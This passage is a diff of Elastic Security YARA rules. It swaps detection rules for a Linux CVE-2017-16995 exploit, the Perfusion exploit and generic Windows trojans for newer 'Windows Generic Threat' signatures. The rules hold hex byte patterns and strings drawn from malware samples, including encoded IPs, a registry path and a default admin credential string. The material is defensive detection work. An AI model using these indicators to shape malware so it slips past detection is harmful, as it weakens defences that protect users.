"d959f755d28782b332248085034950a8d4cad3cde13b22254c90ca3952919e1b" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "27ea79ad607f0dbd3d7892e27be9c142b0ac3a2b56f952f58663ff1fe68d6c88" - severity = 100 + fingerprint = "326a08e467cbedb01c640232ad2f4da729894f09ccf5faba93926e1efded9b59" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a1 = { 32 04 39 83 C7 01 0F BE C0 89 04 24 E8 ?? ?? ?? ?? 3B 7C 24 ?? B8 00 00 00 00 0F 44 F8 83 C5 01 81 FD } + $a1 = { 48 4B 45 59 5F 43 55 52 52 45 4E 54 5F 55 53 45 52 5C 53 6F 66 74 77 61 72 65 5C 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 6F 77 73 5C 43 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 49 6E 74 65 72 6E 65 74 20 53 65 74 74 69 6E 67 73 5C 43 6F 6E 6E 65 63 74 69 6F 6E 73 20 5B 31 20 37 20 31 37 5D } condition: all of them } -rule ELASTIC_Linux_Exploit_CVE_2017_16995_0C81A317 : FILE MEMORY CVE_2017_16995 +rule ELASTIC_Windows_Generic_Threat_59698796 : FILE MEMORY { meta: - description = "Detects Linux Exploit Cve 2017 16995 (Linux.Exploit.CVE-2017-16995)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "0c81a317-b296-4cda-839c-a37903e86786" - date = "2021-01-12" - modified = "2021-09-16" + id = "59698796-0022-486a-a743-6931745f38a0" + date = "2024-03-04" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2017_16995.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "48d927b4b18a03dfbce54bb5f4518869773737e449301ba2477eb797afbb9972" - logic_hash = "cdd6b309a1e802f1251d726b0ea74e3d11fdd10d1d0bfa4c6f3d802f819368ec" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L3104-L3122" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "35f9698e9b9f611b3dd92466f18f97f4a8b4506ed6f10d4ac84303177f43522d" + logic_hash = "59569049dbb09b7e15110fb8de1a146eb7fd606f116b4dd6c75ca973fb62296e" score = 75 quality = 75 - tags = "FILE, MEMORY, CVE-2017-16995" - fingerprint = "40d192607a7237c41c35d90a48cbcfd95a79c0fe7c8017d41389f15a78d620f5" - severity = 100 + tags = "FILE, MEMORY" + fingerprint = "9260d02c3e6b163fd376445bd2a9c084ed85a5dbaf0509e15fff4e9c3d147f19" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 55 48 89 E5 48 89 7D F8 48 8B 45 F8 48 25 00 C0 FF FF 5D C3 55 48 } + $a1 = { 55 8B EC 81 EC B8 04 00 00 ?? ?? ?? ?? ?? 33 C5 89 45 FC 56 68 00 04 00 00 0F 57 C0 C7 45 F8 00 00 00 00 8D 85 58 FB FF FF C7 85 54 FB FF FF 24 00 00 00 6A 00 50 8B F1 0F 11 45 D8 0F 11 45 E8 } condition: all of them } -rule ELASTIC_Linux_Exploit_CVE_2017_16995_82816Caa : FILE MEMORY CVE_2017_16995 +rule ELASTIC_Windows_Generic_Threat_2Ae9B09E : FILE MEMORY { meta: - description = "Detects Linux Exploit Cve 2017 16995 (Linux.Exploit.CVE-2017-16995)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "82816caa-2fff-4b71-9544-443e611aacbf" - date = "2022-01-05" - modified = "2022-01-26" + id = "2ae9b09e-b810-4bd2-9cb8-18b1d504eede" + date = "2024-03-05" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2017_16995.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "14e6b788db0db57067d9885ab5ff3d3a5749639549d82abd98fa4fcf27000f34" - logic_hash = "3ae00290073d41ff5dba2f677510bf9a9c0ebaed221901eb8b1a8dda08157a46" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L3124-L3142" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "dc8f4784c368676cd411b7d618407c416d9e56d116dd3cd17c3f750e6cb60c40" + logic_hash = "183249214e5f8143eb91caf20778b870d17d7a52b6d71ad603827e8716e7e447" score = 75 quality = 75 - tags = "FILE, MEMORY, CVE-2017-16995" - fingerprint = "1a716566946fdd368230c02e2c749b6ce371fa6211be6b3db137af9b117bec87" - severity = 100 + tags = "FILE, MEMORY" + fingerprint = "13ab32abf52bca58dfac79c09882ec4cb80b606693db19813d84e625bda93549" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { BC 89 45 C0 8B 45 B8 48 98 48 C1 E8 03 89 45 C4 48 8B 45 B0 48 } + $a1 = { 55 8B EC 51 51 8B 45 08 89 45 FC 8B 45 0C 89 45 F8 8B 45 0C 48 89 45 0C 83 7D F8 00 76 0F 8B 45 FC C6 00 00 8B 45 FC 40 89 45 FC EB DE 8B 45 08 C9 C3 6A 41 5A 0F B7 C1 66 3B D1 77 0C 66 83 F9 } condition: all of them } -rule ELASTIC_Linux_Exploit_CVE_2017_16995_5Edb0181 : FILE MEMORY CVE_2017_16995 +rule ELASTIC_Windows_Generic_Threat_604A8763 : FILE MEMORY { meta: - description = "Detects Linux Exploit Cve 2017 16995 (Linux.Exploit.CVE-2017-16995)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "5edb0181-dfb1-47e2-873b-0fa3043bee67" - date = "2022-01-05" - modified = "2022-01-26" + id = "604a8763-7ec1-4474-b238-2ebbaf24afa2" + date = "2024-03-05" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2017_16995.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e4df84e1dffbad217d07222314a7e13fd74771a9111d07adc467a89d8ba81127" - logic_hash = "f6eb19329db765938b48021039baaf1b5aeb3240c405ba20ed81863a0fb4b583" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L3144-L3162" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2a51fb11032ec011448184a4f2837d05638a7673d16dcf5dcf4005de3f87883a" + logic_hash = "cf88c0d102680fc7c16d49b6e8dc49c16b27d5940edf078e667a45e70ebe3883" score = 75 quality = 75 - tags = "FILE, MEMORY, CVE-2017-16995" - fingerprint = "804635a4922830b894ed38f58751f481d389e5bfbea7a50912763952971844e6" - severity = 100 + tags = "FILE, MEMORY" + fingerprint = "c74c1dc7588d01112c3995b17e9772af15fb1634ebfb417b8c0069ac1f334e74" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { F8 2F 77 0F 45 89 C2 49 89 D1 41 83 C0 08 4A 8D 54 15 D0 48 } + $a1 = { 55 8B EC 51 8B 45 0C 48 89 45 FC EB 07 8B 45 FC 48 89 45 FC 83 7D FC 00 7C 0B 8B 45 08 03 45 FC C6 00 00 EB E8 C9 C3 55 8B EC 83 EC 0C 8B 45 0C 89 45 FC 8B 45 08 3B 45 10 76 2F 8B 45 FC 89 45 } condition: all of them } -rule ELASTIC_Windows_Exploit_Perfusion_5Ab5Ddee : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_F45B3F09 : FILE MEMORY { meta: - description = "Detects Windows Exploit Perfusion (Windows.Exploit.Perfusion)" - author = "Elastic Security" - id = "5ab5ddee-e79b-4f1c-bd60-92793f14e490" - date = "2024-02-28" - modified = "2024-03-21" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + author = "Elastic Security" + id = "f45b3f09-4203-41f7-870e-d8ef5126c391" + date = "2024-03-05" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Exploit_Perfusion.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7fdef25acb0d1447203b9768ae58a8e21db24816c602b160d105dab86ae34728" - logic_hash = "490f3fc89cf78dbe82f1feb012a147a8d187612720efb6e1eb4e97720b26ee59" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L3164-L3182" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "577f1dbd76030c7e44ed28c748551691d446e268189af94e1fa1545f06395178" + logic_hash = "9b01ad1271cc5052a793e5a885aa7289cbaea4a928f60d64194477c3036496ed" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "c8d13213b20fc99dd71034ddae986c71f6e89f632655e88d5f9c8be1d72c6231" - severity = 100 + fingerprint = "dfa72e0780e895ab5aa2369a425c64144e9bd435e55d8a0fefbe08121ae31df5" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $s1 = "SYSTEM\\CurrentControlSet\\Services\\%ws\\Performance" wide - $s2 = "Win32_Perf" wide - $s3 = "CollectPerfData" wide - $s4 = "%wsperformance_%d_%d_%d.dll" wide + $a1 = { 28 33 ED 44 8B ED 48 89 6C 24 78 44 8B FD 48 89 AC 24 88 00 00 00 44 8B F5 44 8B E5 E8 43 04 00 00 48 8B F8 8D 75 01 ?? ?? ?? ?? ?? 66 39 07 75 1A 48 63 47 3C 48 8D 48 C0 } condition: all of them } -rule ELASTIC_Windows_Trojan_Generic_A681F24A : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_3F390999 : FILE MEMORY { meta: - description = "Detects Windows Trojan Generic (Windows.Trojan.Generic)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "a681f24a-7054-4525-bcf8-3ee64a1d8413" - date = "2021-06-10" - modified = "2021-08-23" + id = "3f390999-601f-464e-8982-09553adee303" + date = "2024-03-05" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Generic.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa" - logic_hash = "72bfefc8f92dbe65d197e02bf896315dcbc54d7b68d0434f43de026ccf934f40" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L3184-L3202" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1b6fc4eaef3515058f85551e7e5dffb68b9a0550cd7f9ebcbac158dac9ababf1" + logic_hash = "462a7a38ebbb39515ac2c0a10353660d0cadcfb99360adcd200edc1db5a716ba" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0" - severity = 25 + fingerprint = "ccfd5fb305ea48d66f299311c5332587355258bdeeb25cb90c450e8e96df3052" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a = "_kasssperskdy" wide fullword - $b = "[Time:]%d-%d-%d %d:%d:%d" wide fullword - $c = "{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}" wide fullword + $a1 = { 10 48 89 D9 48 8B 59 10 FF 61 08 0F 1F 40 00 49 89 CB C3 49 89 CA 41 8B 43 08 41 FF 23 C3 90 48 C1 E1 04 31 C0 81 E1 F0 0F 00 00 49 01 C8 4C 8D 0C 02 4E 8D 14 00 31 C9 45 8A 1C 0A 48 } condition: - 2 of them + all of them } -rule ELASTIC_Windows_Trojan_Generic_Ae824B13 : REF1296 FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Abd1C09D : FILE MEMORY { meta: - description = "Detects Windows Trojan Generic (Windows.Trojan.Generic)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "ae824b13-eaae-49e6-a965-ff10379f3c41" - date = "2022-02-03" - modified = "2022-04-12" + id = "abd1c09d-ec66-45ee-b435-302c736cc1f9" + date = "2024-03-05" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Generic.yar#L23-L43" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "cee46c1efdaa1815606f932a4f79b316e02c1b481e73c4c2f8b7c72023e8684c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L3204-L3222" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3ff09d2352c2163465d8c86f94baa25ba85c35698a5e3fbc52bc95afc06b7e85" + logic_hash = "80e6f317e5cd91cb3819e9251efc8c96218071bec577a38c8784826dd4a657cb" score = 75 - quality = 67 - tags = "REF1296, FILE, MEMORY" - fingerprint = "8658996385aac060ebe9eab45bbea8b05b9008926bb3085e5589784473bc3086" - severity = 100 + quality = 75 + tags = "FILE, MEMORY" + fingerprint = "2f75d8fa11f67f983e40ada50a07e8a6f1b6dfc663524e35a6526381e939d39f" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 31 31 34 2E 31 31 34 2E 31 31 34 2E 31 31 34 } - $a2 = { 69 6E 66 6F 40 63 69 61 2E 6F 72 67 30 } - $a3 = { 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 33 3B 20 57 4F 57 36 34 29 20 41 70 70 6C 65 57 65 62 4B 69 74 2F 35 33 37 2E 33 36 20 28 4B 48 54 4D 4C 2C 20 6C 69 6B 65 20 47 65 63 6B 6F 29 20 43 68 72 6F 6D 65 2F 35 30 2E 30 2E 32 36 36 31 2E 39 34 20 53 61 66 61 72 69 2F 35 33 37 2E 33 36 } - $a4 = { 75 73 65 72 25 33 64 61 64 6D 69 6E 25 32 36 70 61 73 73 77 6F 72 64 25 33 64 64 65 66 61 75 6C 74 25 34 30 72 6F 6F 74 } + $a1 = { 83 EC 0C 8B D1 53 56 57 8B 7D 0C 83 FF 08 77 1A 85 FF 74 16 8B 5D 08 8B 4A 14 8B 72 10 2B CE 8D 04 3B 3B C1 72 11 C6 42 44 00 33 C0 33 D2 5F 5E 5B 8B E5 5D C2 08 00 0F 57 C0 66 0F 13 } condition: - 3 of them + all of them } -rule ELASTIC_Windows_Trojan_Generic_Eb47E754 : REF1296 FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_B7870213 : FILE MEMORY { meta: - description = "Detects Windows Trojan Generic (Windows.Trojan.Generic)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "eb47e754-9b4d-45e7-b76c-027d03326c6c" - date = "2022-02-03" - modified = "2022-04-12" + id = "b7870213-e235-4b2d-83c1-e3c7c486ee8d" + date = "2024-03-05" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Generic.yar#L45-L65" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "1d96e813ed0261bd0d7caca2803ed8d5fe4d77ea00efc9130eef86aa872c4656" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L3224-L3242" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "04cb0d5eecea673acc575e54439398cc00e78cc54d8f43c4b9bc353e4fc4430d" + logic_hash = "79b8385543def42259cd9c09d4d7059ff6bb02a9e87cff1bc0a8861e3b333c5f" score = 75 - quality = 67 - tags = "REF1296, FILE, MEMORY" - fingerprint = "b71d13a34e5f791612ed414b8b0e993b1f476a8398a1b0be39046914ac5ac21d" - severity = 100 + quality = 73 + tags = "FILE, MEMORY" + fingerprint = "c087f84c8572dba64da62c9f317969cbce46e78656e0a75489788add787c2781" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 41 20 61 74 20 4C 20 25 64 } - $a2 = { 74 63 70 69 70 5F 74 68 72 65 61 64 } - $a3 = { 32 30 38 2E 36 37 2E 32 32 32 2E 32 32 32 } - $a4 = { 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 33 3B 20 57 4F 57 36 34 29 20 41 70 70 6C 65 57 65 62 4B 69 74 2F 35 33 37 2E 33 36 20 28 4B 48 54 4D 4C 2C 20 6C 69 6B 65 20 47 65 63 6B 6F 29 20 43 68 72 6F 6D 65 2F 35 37 2E 30 2E 32 39 38 37 2E 31 33 33 20 53 61 66 61 72 69 2F 35 33 37 2E 33 36 } + $a1 = { 75 28 6B 6E 4E 30 30 30 31 30 32 30 33 30 34 30 35 30 36 30 37 30 38 30 39 31 30 31 31 31 32 31 33 31 34 31 35 31 36 31 37 31 38 31 39 32 30 32 31 32 32 32 33 32 34 32 35 32 36 32 37 32 38 32 39 33 30 33 31 33 32 33 33 33 34 33 35 33 36 33 37 33 38 33 39 34 30 34 31 34 32 34 33 34 34 34 35 34 36 34 37 34 38 34 39 35 30 35 31 35 32 35 33 35 34 35 35 35 36 35 37 35 38 35 39 36 30 36 31 36 32 36 33 36 34 36 35 36 36 36 37 36 38 36 39 37 30 37 31 37 32 37 33 37 34 37 35 37 36 37 37 37 38 37 39 38 30 38 31 38 32 38 33 38 34 38 35 38 36 38 37 38 38 38 39 39 30 39 31 39 32 39 33 39 34 39 35 39 36 39 37 39 38 39 39 } condition: - 3 of them + all of them } -rule ELASTIC_Windows_Trojan_Generic_C7Fd8D38 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_2Bba6Bae : FILE MEMORY { meta: - description = "Detects Windows Trojan Generic (Windows.Trojan.Generic)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "c7fd8d38-eaba-424d-b91a-098c439dab6b" - date = "2022-02-17" - modified = "2022-04-12" + id = "2bba6bae-7c6a-4b89-83d8-0656d7863820" + date = "2024-03-05" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Generic.yar#L67-L89" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a1702ec12c2bf4a52e11fbdab6156358084ad2c662c8b3691918ef7eabacde96" - logic_hash = "81c56cd741692a7f2a894c2b8f2676aad47f14221228b9466a2ab0f05d76c623" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L3244-L3262" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d9955c716371422750b77d64256dade6fbd028c8d965db05c0d889d953480373" + logic_hash = "59e4b173c21b0ab161adf8d89f253f21403bca706b6bf40b3da00697f87dd509" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "dc14cd519b3bbad7c2e655180a584db0a4e2ad4eea073a52c94b0a88152b37ba" - severity = 100 + fingerprint = "85dc02cb74c481b5ecb144280827add9665138f0b5d479db5468a94b41e662a3" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = "PCREDENTIAL" ascii fullword - $a2 = "gHotkey" ascii fullword - $a3 = "EFORMATEX" ascii fullword - $a4 = "ZLibEx" ascii fullword - $a5 = "9Root!" ascii fullword + $a1 = { 36 35 20 37 39 20 34 31 20 36 39 20 36 34 20 34 38 20 36 43 20 37 37 20 34 39 20 36 41 20 36 46 20 36 37 20 34 39 20 36 42 20 37 30 20 35 38 20 35 36 20 34 33 20 34 39 20 37 33 20 34 39 20 34 33 20 34 41 20 36 38 20 36 32 20 34 37 20 36 33 20 36 39 20 34 46 20 36 39 20 34 31 20 36 39 20 35 32 20 35 37 20 35 32 20 34 35 20 35 35 20 33 30 20 34 35 20 36 39 20 34 39 20 34 38 20 33 30 } condition: all of them } -rule ELASTIC_Windows_Trojan_Generic_Bbe6C282 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_4Db75701 : FILE MEMORY { meta: - description = "Detects Windows Trojan Generic (Windows.Trojan.Generic)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "bbe6c282-e92d-4021-bdaf-189337e4abf0" - date = "2022-03-02" - modified = "2022-04-12" + id = "4db75701-e7d6-4231-ba00-e127da90bfce" + date = "2024-03-05" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Generic.yar#L91-L109" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a44c46d4b9cf1254aaabd1e689f84c4d2c3dd213597f827acabface03a1ae6d1" - logic_hash = "fe874d69ae71775cf997845c90e731479569e2ac1ac882a4b8c3c73d015b1f30" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L3264-L3282" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "fa7847d21d5a350cf96d7ecbcf13dce63e6a0937971cfb479700c5b31850bba9" + logic_hash = "65f7d15ed551e069b30ce6c0a5f15d01d24b8b29727950269c9956fcf6dc799d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e004d77440a86c23f23086e1ada6d1453178b9c2292782c1c88a7b14151c10fe" - severity = 100 + fingerprint = "d8637b329a212bf37367ba3cc3acf65c9b511d1f06d689d792c519324459530d" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 00 D1 1C A5 03 08 08 00 8A 5C 01 08 08 00 8A 58 01 2E 54 FF } + $a1 = { 48 81 EC D0 02 00 00 80 79 20 08 41 8B F1 45 8B F0 4C 8B FA 48 8B F9 0F 84 3A 01 00 00 48 89 58 10 48 89 68 18 43 8D 04 40 48 63 C8 ?? ?? ?? ?? ?? 48 8D 8C 24 20 02 00 00 } condition: all of them } -rule ELASTIC_Windows_Trojan_Generic_889B1248 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_54A914C9 : FILE MEMORY { meta: - description = "Detects Windows Trojan Generic (Windows.Trojan.Generic)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "889b1248-a694-4c9b-8792-c04e582e814c" - date = "2022-03-11" - modified = "2022-04-12" + id = "54a914c9-1b00-4cea-9b82-f7ed1df1305f" + date = "2024-03-25" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Generic.yar#L111-L132" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a48d57a139c7e3efa0c47f8699e2cf6159dc8cdd823b16ce36257eb8c9d14d53" - logic_hash = "b3bb93b95377d6c6606d29671395b78c0954cc47d5cc450436799638d0458469" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L3284-L3302" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c418c5ad8030985bb5067cda61caba3b7a0d24cb8d3f93fc09d452fbdf4174ec" + logic_hash = "0cc3797564b4c722423f915493e07b0e0fec3085e7a535f9914f82d73c797bed" score = 75 - quality = 50 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "a5e0c2bbd6a297c01f31eccabcbe356730f50f074587f679da6caeca99e54bc1" - severity = 100 + fingerprint = "d3f4083c96130031ce9656ea31bf0914080c88f09c05f8b1168c60487af80c9b" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = "BELARUS-VIRUS-MAKER" ascii fullword - $a2 = "C:\\windows\\temp\\" ascii fullword - $a3 = "~c~a~n~n~a~b~i~s~~i~s~~n~o~t~~a~~d~r~u~g~" ascii fullword - $a4 = "untInfector" ascii fullword + $a1 = { 20 48 89 CB 48 8B 43 08 4C 8B 48 30 4D 85 C9 74 16 48 8D 4B 10 0F B6 D2 48 83 C4 20 5B 5E 5F 5D 41 5C 49 FF E1 66 90 44 0F B6 40 10 41 80 F8 16 0F 84 81 00 00 00 41 80 F8 18 74 0B 48 } condition: all of them } -rule ELASTIC_Windows_Trojan_Generic_02A87A20 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_38A88967 : FILE MEMORY { meta: - description = "Detects Windows Trojan Generic (Windows.Trojan.Generic)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "02a87a20-a5b4-44c6-addc-c70b327d7b2c" - date = "2022-03-04" - modified = "2022-04-12" + id = "38a88967-db0e-4d68-9295-9108cbc98fb9" + date = "2024-03-25" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Generic.yar#L134-L152" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "13037b749aa4b1eda538fda26d6ac41c8f7b1d02d83f47b0d187dd645154e033" - logic_hash = "610db1b429ed2ecfc552f73ed4782cb56254e6fc98b728ffeff6938fbcce9616" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L3304-L3322" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6e425eb1a27c4337f05d12992e33fe0047e30259380002797639d51ef9509739" + logic_hash = "ddbdb1c39a07141d83173504214c889aff75487570d906413ebc6f262fedf9ae" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "fb25a522888efa729ee6d43a3eec7ade3d08dba394f3592d1c3382a5f7a813c8" - severity = 100 + fingerprint = "1fef2c4c2899bbf9f45732d23654f6437658de2c4dc78dc3d1ff5440b5c2cbcf" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 24 3C 8B C2 2B C1 83 F8 01 72 3A 8D 41 01 83 FA 08 89 44 24 38 8D 44 } + $a1 = { 55 8B EC 60 E8 00 00 00 00 5B ?? ?? ?? ?? ?? ?? 8B 75 08 8B 7D 0C AD 50 53 89 C1 29 DB 29 C0 AC C1 E3 